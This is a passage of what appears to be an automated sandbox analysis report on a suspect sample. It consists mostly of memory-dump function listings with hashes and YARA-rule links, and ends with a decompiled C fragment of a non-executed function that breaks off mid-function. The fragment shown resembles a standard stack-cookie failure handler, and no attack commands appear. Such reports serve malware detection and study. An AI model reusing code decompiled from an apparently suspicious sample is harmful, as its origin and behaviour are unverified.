                                                                                                            • Opcode Fuzzy Hash: 934ab349e8651aba01da9f8a5d9ddf1246602644e1bb049d542964d5478b966f
                                                                                                            • Instruction Fuzzy Hash: 2121E5B5609341AFD340CF19D880A1BFBE4FF89664F04896EF888D7311E230E904CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 02498C64, Relevance: .1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.920087990.0000000002496000.00000040.00000040.sdmp, Offset: 02496000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bcd35fc75641c252690ab1bbc005bd53d2fd99437db50470c1efec4bfefba4ef
                                                                                                            • Instruction ID: 7e9a8b850ebab4a0cd3e97a40fd9ace6046a32f5c2365eab72f5db8afded130a
                                                                                                            • Opcode Fuzzy Hash: bcd35fc75641c252690ab1bbc005bd53d2fd99437db50470c1efec4bfefba4ef
                                                                                                            • Instruction Fuzzy Hash: 55216D3510E3C09FC7078B24D990B55BFB1AF47208F2986DED4854F6A3C32A881ACB52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05443ED8, Relevance: .1, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.922796113.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fce4c362db979aa5f1b5f126b088ce69ca7c27f86108c56e359f18169e90baf3
                                                                                                            • Instruction ID: b9f81557006fd0dea5db320defcf0849cb79bac1ac3fffec61fb985f41e9549c
                                                                                                            • Opcode Fuzzy Hash: fce4c362db979aa5f1b5f126b088ce69ca7c27f86108c56e359f18169e90baf3
                                                                                                            • Instruction Fuzzy Hash: 7211BAB5609341AFD350CF19D880A5BFBE4FB98664F04896EF898D7311D231EA04CFA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 055A00D6, Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.922906675.00000000055A0000.00000040.00000001.sdmp, Offset: 055A0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35f77731955aacde33692b9118cf819180d8727c6bebe21b043b95cd99d3371a
                                                                                                            • Instruction ID: 3ac00702d5af8c84a6e4a1782ed677a75ff41d0d36cd5efa196b0c083214f4d8
                                                                                                            • Opcode Fuzzy Hash: 35f77731955aacde33692b9118cf819180d8727c6bebe21b043b95cd99d3371a
                                                                                                            • Instruction Fuzzy Hash: 870180B254E3C06FC7138B169C80952BFB8EF43624B1984CBEC848F197D235A905C772
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 02498C94, Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.920087990.0000000002496000.00000040.00000040.sdmp, Offset: 02496000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 74544a4ba1153dc29c263ef241fe5fefe6436b200159e7a48dc244ac9511ae19
                                                                                                            • Instruction ID: 368bcdce562e60ca14b542951d8a2f264e36a553de855fe49f8daf1a356763c1
                                                                                                            • Opcode Fuzzy Hash: 74544a4ba1153dc29c263ef241fe5fefe6436b200159e7a48dc244ac9511ae19
                                                                                                            • Instruction Fuzzy Hash: 7111B4312453409FDB15CB18C940B26BF91EF8A708F28CA9EE9494B756C77BD843CA51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020FA7CC, Relevance: .1, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919213284.00000000020F5000.00000040.00000001.sdmp, Offset: 020F5000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 70355b67e90716f0372c02bec45e59d0554d8193ca9f7fa39a18afdded438ab2
                                                                                                            • Instruction ID: 3b51b9425ea80406562db707192540bbd8f5c12f8cced3e52f0718b316a4005e
                                                                                                            • Opcode Fuzzy Hash: 70355b67e90716f0372c02bec45e59d0554d8193ca9f7fa39a18afdded438ab2
                                                                                                            • Instruction Fuzzy Hash: 151173B25493416FD352CF55DC41A57FFF4EF86620F08C9AAF8888B212D275A904CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B286A0, Relevance: .1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9bb89ddeb4d2c486e6c40390b0a5fd2ae8d464a0f5705fa2e1eaf1c138c7d604
                                                                                                            • Instruction ID: e4fd7070c6ca2c48f984e9b15dc24273f8349d90cfaa800e71d93070e325474e
                                                                                                            • Opcode Fuzzy Hash: 9bb89ddeb4d2c486e6c40390b0a5fd2ae8d464a0f5705fa2e1eaf1c138c7d604
                                                                                                            • Instruction Fuzzy Hash: 7401C031B002208BC761FA2DD844A2B7797EBC8761B14C6A9D9098F798DE709C02C790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020FA8E4, Relevance: .0, Instructions: 50COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919213284.00000000020F5000.00000040.00000001.sdmp, Offset: 020F5000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd118d32bebcad3bd44d7444efb3a532abc4bceb04a5099583080d5727440506
                                                                                                            • Instruction ID: 9ee5c97026e6bd1b922232d02fdc515aba8961a76a5ce2e2dfde25abac3fd062
                                                                                                            • Opcode Fuzzy Hash: cd118d32bebcad3bd44d7444efb3a532abc4bceb04a5099583080d5727440506
                                                                                                            • Instruction Fuzzy Hash: 000124B210E3C02FD71347255C55AA2BFB8DF43620F0C84CBE9848F163D116A909C7A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 024905CF, Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.920064863.0000000002490000.00000040.00000040.sdmp, Offset: 02490000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b5494963bcf1246c761fe89d599fef3f827f6720ffc1d0dbfcd3493c428d2866
                                                                                                            • Instruction ID: f4aae2130b46792671179d90269b1eb723315f0afe6f8e2572fe96f414d2be99
                                                                                                            • Opcode Fuzzy Hash: b5494963bcf1246c761fe89d599fef3f827f6720ffc1d0dbfcd3493c428d2866
                                                                                                            • Instruction Fuzzy Hash: 7801A77250D7806FD7128B169C40862FFB8DE86120709C4DFEC498B613D125A908CB72
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 055A0115, Relevance: .0, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.922906675.00000000055A0000.00000040.00000001.sdmp, Offset: 055A0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 017ba832710c397031e108c28179466afac75275adbe3384c508b66504bdcb98
                                                                                                            • Instruction ID: d4dcc8d0fc9e4986dee5655adf77f32d0312c0312d3795c7f95f356c8c4ff2a4
                                                                                                            • Opcode Fuzzy Hash: 017ba832710c397031e108c28179466afac75275adbe3384c508b66504bdcb98
                                                                                                            • Instruction Fuzzy Hash: 45E0DFB2906304ABC2508F07EC85A12FB98DF44A32F18C06BEC080F702E572F100CEA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 02498D50, Relevance: .0, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.920087990.0000000002496000.00000040.00000040.sdmp, Offset: 02496000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
                                                                                                            • Instruction ID: 12af616cbdaf50262d7b05f8842b43a416efc76da620ecfd1cd50687ab8c5f73
                                                                                                            • Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
                                                                                                            • Instruction Fuzzy Hash: F3F01935208644DFC706CF04D940B26FBA2EB89718F24C6ADE9490BB62C737E813DA81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 024905F6, Relevance: .0, Instructions: 27COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.920064863.0000000002490000.00000040.00000040.sdmp, Offset: 02490000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f5e7aa879f8c3a7ae9ad45760f84f57bce0b5b926f4408b71b2d36f33106b59f
                                                                                                            • Instruction ID: aa81833e9e9796e0620198c46e6279183f3945a602b232c5e758ce3850678e85
                                                                                                            • Opcode Fuzzy Hash: f5e7aa879f8c3a7ae9ad45760f84f57bce0b5b926f4408b71b2d36f33106b59f
                                                                                                            • Instruction Fuzzy Hash: B4E06DB66017005BD650CF0AEC41452FBD4EB84630718C06BDC0D8B701E535B504CAA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020FA81B, Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919213284.00000000020F5000.00000040.00000001.sdmp, Offset: 020F5000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 048dc1044971c10b942f83e77d28a39dcc455b2757391c6e6503c2dbe5407927
                                                                                                            • Instruction ID: 8325d690866939df23f52e94c68d61c1d1d2af80b4758b5a5603d52b468ce33a
                                                                                                            • Opcode Fuzzy Hash: 048dc1044971c10b942f83e77d28a39dcc455b2757391c6e6503c2dbe5407927
                                                                                                            • Instruction Fuzzy Hash: AEE0D8B264130067D2608E069C46B12FB98EB50A30F08C567ED081B701E4A1B504CAE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020FA918, Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919213284.00000000020F5000.00000040.00000001.sdmp, Offset: 020F5000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d72043cd842f86f8d06ea1f6470211ea1a39c9472e7208f3d3219746562840d4
                                                                                                            • Instruction ID: 027c031be7550bd7ba43fe3f7b2d7e9bc93b2e267addb2e04c86f9dbb3e2dc0c
                                                                                                            • Opcode Fuzzy Hash: d72043cd842f86f8d06ea1f6470211ea1a39c9472e7208f3d3219746562840d4
                                                                                                            • Instruction Fuzzy Hash: 85E020B264130067D2608F079C46B12FF98DB40930F48C467FD081F702E076F504C9E5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05443F43, Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.922796113.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 52a20403dbb46e5a5981d4c7552d9b4246e11567052e2ac8670a5515b0319063
                                                                                                            • Instruction ID: f0c5e997348e313bb4220e5f4ee3cef768f8331ea79c572f49fba8686b335b38
                                                                                                            • Opcode Fuzzy Hash: 52a20403dbb46e5a5981d4c7552d9b4246e11567052e2ac8670a5515b0319063
                                                                                                            • Instruction Fuzzy Hash: C6E092B264230067D2508A06AC45B22FB98DB94A30F08C467ED081B606E061A51489E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 054434DB, Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.922796113.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b1593bb89548aa3e34f10a3a9f45063394c3f3116cab341295f3ab35961585c3
                                                                                                            • Instruction ID: 314fab1a1da48e37c88d5ddc69d9d15e7bcec01d61f00ebaefb80397c06326fe
                                                                                                            • Opcode Fuzzy Hash: b1593bb89548aa3e34f10a3a9f45063394c3f3116cab341295f3ab35961585c3
                                                                                                            • Instruction Fuzzy Hash: 9CE0D8B260130067D2508F069C46F23FB98DB90A30F08C457ED081F702E071B514C9F5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B24921, Relevance: .0, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1f1aed45b13ea447906c8379b74218f2c82cbe2403fa86398d6100882f483625
                                                                                                            • Instruction ID: 06e98ab68c2fe826931932a181b264ee24c46857f0ecff74cfc4a6b289165182
                                                                                                            • Opcode Fuzzy Hash: 1f1aed45b13ea447906c8379b74218f2c82cbe2403fa86398d6100882f483625
                                                                                                            • Instruction Fuzzy Hash: A3F0E9345483A04BDB869F3084A82E6BBB2FB55320F2448D5D94D8E646DA354945CB02
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B281F0, Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 814aebe6a42ca70babcb1650296fefbc2213b9361bf685d71f2a871aad29ff6f
                                                                                                            • Instruction ID: ef68181f25e64a0af172bbc1dc264d4d5b843a58d4e64ec282bfc3b3098bd6ef
                                                                                                            • Opcode Fuzzy Hash: 814aebe6a42ca70babcb1650296fefbc2213b9361bf685d71f2a871aad29ff6f
                                                                                                            • Instruction Fuzzy Hash: DDE01A30790705CBC780FA2DE441A1633EAB744B01B0088659604CB78CEB31EC01CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B28F00, Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ac3d939f4c0e38f23516d241b2825ecc8d917c39c880544dbf29f8498c146105
                                                                                                            • Instruction ID: 5e3933102752e4ea0ab806f5161615e385e2f42c98691acaba03417d15642842
                                                                                                            • Opcode Fuzzy Hash: ac3d939f4c0e38f23516d241b2825ecc8d917c39c880544dbf29f8498c146105
                                                                                                            • Instruction Fuzzy Hash: EFD0A7313001105B4614226DA0118AE76DF9FC56B2319507EF106C7361CD519C0183E6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020D23F4, Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919018023.00000000020D2000.00000040.00000001.sdmp, Offset: 020D2000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5fe05e9dd63860ab6d548e5f6d1b3e89ce25c6b4a32853250ea148c3769a6d99
                                                                                                            • Instruction ID: 9a0e8bebc14403582445381c5e7f03f984b651c9b2f0a338915a28c6082cdb18
                                                                                                            • Opcode Fuzzy Hash: 5fe05e9dd63860ab6d548e5f6d1b3e89ce25c6b4a32853250ea148c3769a6d99
                                                                                                            • Instruction Fuzzy Hash: D7D05E79206B914FD3278A1CC1A8B953BD4AB51B08F4684FAAC008B667C368E6D1E200
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020D23BC, Relevance: .0, Instructions: 14COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919018023.00000000020D2000.00000040.00000001.sdmp, Offset: 020D2000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ccfd53fa37277f304cd7694669adfe7d674622dea639f95c4246a9504d580c75
                                                                                                            • Instruction ID: 1580709e635ddad0f96a7d7f6c3aabab8eddeb205c49c63a508e098e0d1abc2a
                                                                                                            • Opcode Fuzzy Hash: ccfd53fa37277f304cd7694669adfe7d674622dea639f95c4246a9504d580c75
                                                                                                            • Instruction Fuzzy Hash: 61D05E342013814FC716DB0CC1D4F5977D4AB81B04F1644E9BC008B266C7B4D881D600
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B24FB3, Relevance: .0, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 232081f6d2bcf85bd8975ad93fdedb4ac068af549d45a186d32a2d03f4e10adb
                                                                                                            • Instruction ID: 3c1b8e7de90abaf3029f64266c8e57e3c9a2d3f84c25accf0415122b62caad75
                                                                                                            • Opcode Fuzzy Hash: 232081f6d2bcf85bd8975ad93fdedb4ac068af549d45a186d32a2d03f4e10adb
                                                                                                            • Instruction Fuzzy Hash: 74D01230A006ACCBDBA0CA08CC84BEAB736FB84300F0040D0E24DA32A8D7346F81CF42
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B21838, Relevance: .0, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3eda04144d262b4e230289b01151fb5467b929ccc4ed24d467b40b1312fe2705
                                                                                                            • Instruction ID: c593c181c52ebabf6b1b871a514ae2ca959b8d8ccacd07dcf41297eeaa9b4b72
                                                                                                            • Opcode Fuzzy Hash: 3eda04144d262b4e230289b01151fb5467b929ccc4ed24d467b40b1312fe2705
                                                                                                            • Instruction Fuzzy Hash: 1CC01274A802109FF7945B10C8987B87661FBC4700F004494E60A55180CEBD1994CB12
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B280D8, Relevance: .0, Instructions: 6COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 77650558a7925f275ddcb8f296255adad7f9a23ccf9e75f148b6b558b574c762
                                                                                                            • Instruction ID: 531a7cc94dfa07027136f05cc84aed8a0559ad6ceccdab1a9bf8506da73836a1
                                                                                                            • Opcode Fuzzy Hash: 77650558a7925f275ddcb8f296255adad7f9a23ccf9e75f148b6b558b574c762
                                                                                                            • Instruction Fuzzy Hash: 79A0223008AB0CCAC32022B82802028338C080200838080B8A30C08A20083BF0A0C080
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B28118, Relevance: .0, Instructions: 6COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c63839ccbe40c5a89ea8bfcc203ec765aa257ed2ec17db1fce97039befc50bbb
                                                                                                            • Instruction ID: 81537ebea8bc3dc26a128a3d4f6812f2df38d6b926b0e79e30f69b38597a5be9
                                                                                                            • Opcode Fuzzy Hash: c63839ccbe40c5a89ea8bfcc203ec765aa257ed2ec17db1fce97039befc50bbb
                                                                                                            • Instruction Fuzzy Hash: 3BB0123248020CA787005A81EC04845FF1CE710250B008021F60400421873274309595
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B280B8, Relevance: .0, Instructions: 5COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fd1b82993b6a6c6554bf677e44fa534cb82c33219d333991793071aa68f2f417
                                                                                                            • Instruction ID: 914eb81585e55d4a2102ec8066f434cd8a495977c1a7957ec1960a8574a2e512
                                                                                                            • Opcode Fuzzy Hash: fd1b82993b6a6c6554bf677e44fa534cb82c33219d333991793071aa68f2f417
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B287A0, Relevance: .0, Instructions: 5COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a7caf3e59cafb43092098d1d160052405070a09e6da94d61b948f30140372a86
                                                                                                            • Instruction ID: ae253f5e86b4b4ff8f7d1c230e6484d370cc703011c1d3498444316b0ad2897a
                                                                                                            • Opcode Fuzzy Hash: a7caf3e59cafb43092098d1d160052405070a09e6da94d61b948f30140372a86
                                                                                                            • Instruction Fuzzy Hash: 949002318D470C8B468027997409596BB6CA544526B800451A70D429119B59747045A6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B27DA8, Relevance: .0, Instructions: 5COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 06e2ebfe6f4c98646f77e2b527778a2cc1fd7149a66a42e1162eb3c85646f5bf
                                                                                                            • Instruction ID: 85460ab466870b66be9bb220a23ee3babf8fbcb9e9813b15529fe773f5c8cec1
                                                                                                            • Opcode Fuzzy Hash: 06e2ebfe6f4c98646f77e2b527778a2cc1fd7149a66a42e1162eb3c85646f5bf
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B28018, Relevance: .0, Instructions: 5COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f26c7faa206ccb82b8a6b5ccbd939d88c58848029b8afda18ea28f6d29314264
                                                                                                            • Instruction ID: d941ed0c4aacfe579bcd7fcc48441bceae3aae512c15e7fe26ae487b47b50967
                                                                                                            • Opcode Fuzzy Hash: f26c7faa206ccb82b8a6b5ccbd939d88c58848029b8afda18ea28f6d29314264
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B2277F, Relevance: .0, Instructions: 5COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2f0813868b04d6f8f4d5c412a21fbc9f8b5f7b0aec3951d91a1f55c50e9d3c53
                                                                                                            • Instruction ID: fee1ac92763eccd0d7b2e983606516d9d2734a6283ee79f2b140d16c100a44ae
                                                                                                            • Opcode Fuzzy Hash: 2f0813868b04d6f8f4d5c412a21fbc9f8b5f7b0aec3951d91a1f55c50e9d3c53
                                                                                                            • Instruction Fuzzy Hash: 5EB01274AC4324C7F3D05B30CDCD798B5317784704F04C882CB0910580CEFC4184AE01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B24DA4, Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 843333a6673df1b776cba97aff8a2b8aa401771fd81e17067afef0011968a8ae
                                                                                                            • Instruction ID: 20e463681fdfe2b369d3307f67e3d2934e315b15072f965f33f2c5798dbee286
                                                                                                            • Opcode Fuzzy Hash: 843333a6673df1b776cba97aff8a2b8aa401771fd81e17067afef0011968a8ae
                                                                                                            • Instruction Fuzzy Hash: 08B09230984224CBE7949B20C9987A8BA70BB40300F0009E5C20A61151CA341AD88E01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 0040CDC9, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E0040CDC9(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0xec8f03f6
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0xec8f03f6
				_v812 = _t12;
				_t13 =  *0x422238; // 0x1370fc09
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138BC(_t14);
